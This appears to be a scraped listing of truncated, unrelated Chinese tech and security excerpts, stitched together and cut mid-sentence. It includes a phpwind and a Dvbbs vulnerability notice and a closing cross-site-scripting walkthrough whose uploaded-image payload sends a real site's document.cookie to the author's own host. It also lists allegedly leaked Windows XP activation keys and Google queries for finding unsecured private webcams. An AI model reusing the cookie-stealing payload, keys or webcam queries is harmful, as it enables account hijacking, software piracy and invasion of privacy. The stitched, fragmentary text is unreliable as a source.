漏洞发布：http://www.80sec.com/ 漏洞作者：jianxin@80sec.com 漏洞厂商： http://www.phpwind.com/ 本漏洞影响phpwind所有版本 漏洞危害：高 漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作 利用方式：http://www.80sec.com有提供exploit 漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心...

作者：小帥(xsser)@[0.S.T] 本文已发表在《黑客手册》第4期，转载请注明出处，或以超链接方式注明：http://blog.0kee.com/xiaoshuai 小帥's blog很久没去asp300溜达了，不去总觉得的对不起这个发布站的流量，也对不起黑客手册那么多读者的强烈要求（别扔鸡蛋！扔钱！），那好，既然牛都吹起来了，我不得不冒着生命危险看看代码吧，反正我下载下来的时候就觉得很伟大，这个系统很伟大，他吹的比我还大，好好，我们看他怎么说的：88red生成htm静态页面企业建站系统V3.0经过精心打造正式推出，集合了网站地图、企业新闻中心、企业产品、搜...

$False$...

作者：AbhijeetBhattacharya(abhbhatt@in.ibm.com),系统软件工程师,IBMIndiaKiranShivaramaShivaramaSundar(kisundar@in.ibm.com),系统软件工程师,IBMIndia2007年5月28日如果您知道内存泄漏的起因，那么在JavaScript中进行相应的防范就应该相当容易。在这篇文章中，作者KiranSundar和AbhijeetBhattacharya将带您亲历JavaScript中的循环引用的全部基本知识，向您介绍为何它们会在某些浏览器中产生问题，尤其是在结合了闭包的情况下。在了解了您应该引起注意的常见内...

微软内部泄露的 XP的KEY和无限次激活码几个网友进行测试了，全是１０～１４之间的ｋｅｙ的确可用！ 任何版本都能使用Windows XP专业版最新注册码HTXH6-2JJC4-CDB6C-X38B4-C3GF3RT4H2-8WYHG-QKK6K-WWHJ2-9427XDYPVX-43TRT-YDBGB-7YQJX-CWXW7HGM7B-YF7T7-8R7RF-Y6RPY-XTQ77Windows XP专业版最新注册码DJQJB-PC83T-FTGJC-CQTCK-RJD8DVMMBM-8WK8W-H44YH-37B4M-KX8QRXRCTF-Y68KJ-...

来源:黑客基地 作者:黑客基地 本文主要讲了Windows XP SP2在使用过程中可能遇到的一些故障，并且笔者给出了解决方法。 　　1.找回丢失的IE图片验证码 　　安装SP2后，大多数用户发现在访问某些需要填写验证码的地方，都无法显示验证码图片(显示为一个红色小叉)，这是一个非常严重的BUG。解决办法为:运行“Regedit”命令打开注册表编辑器，依次定位到“[HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Internet Explorer \Security]”，在窗...

漏洞发现：LiNZI[B.C.T]@www.cnbct.org 厂商名字：动网先锋论谈 厂商地址：http://www.dvbbs.net/ 漏洞程序：Dvbbs 7.1.0 漏洞描述: Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞，攻击者可以配合其它技术，实现SQL跨库查询等。 漏洞利用例子: 一、泄露绝对漏洞测试: 对官方的测试站点:bbs.dvbbs.net 上传一张图，代码如下: GIF89a <script>al...

这个帖子主要是所有的PHPers把自己在开发或学习中的一些经验技巧进行总结,主要就是把解决某种事情更好的方法告诉大家.我先说几个:1,假如你使用echo输出一个简单的语句,类似与:[code]<?php echo "Hello World!"; ?> 那么你可以偷懒一下,写成这样: <?="Hello World!";?>  [/code]2,str_replace()可以使用数组进行替换,比如: [code]<? $string  =...

现在，很多网友已经购买了好用又便宜的摄像头，可以和其他朋友进行视频聊天。不过，仅仅看到自己周围的人物有些单调，要是能看到世界各地的即时画面就好了。其实这并不难，Internet上有很多免费的摄像头(Webcam)等着你呢！　　　　利用Google搜索隐秘视频　　Google真的几近于无所不能，除可以用作强大的黑客工具外，还能用来搜索到成百上千未经加密的Webcam(网络摄像头)。只要在Google中搜索以下几个关键词中的任何一个:“inurl:"ViewerFrame?Mode="”，“inurl:"MultiCameraFrame?Mode="”，“intitlE:"LiveView/-AX...

bugtraqid1500classAccessValidationErrorcveGENERIC-MAP-NOMATCHremoteYeslocalYespublishedJuly24,2000updatedJuly24,2000vulnerableIBMWebsphereApplicationServer3.0.21-SunSolaris8.0-MicrosoftWindowsNT4.0-Linuxkernel2.3.x-IBMAIX4.3IBMWebsphereApplicationServer3.0-SunSolaris8.0-NovellNetware5.0-MicrosoftWin...

一、跨站测试先看看我的一次跨站测试吧我以职业欠钱的站点做测试吧:Host:zhiyeqianqian.51web.cnMy Test:先在他的论谈上传两张图，图一的内容是:<script>document.location=’http://linzi.cnbct.org/cookie.asp?msg=’+document.cookie</script>得到url为UploadFile/2005-6/200562716565777847.jpg图二则是偶的个人照UploadFile/2005-6/200562716563048909.jpg写个盗cookie的代...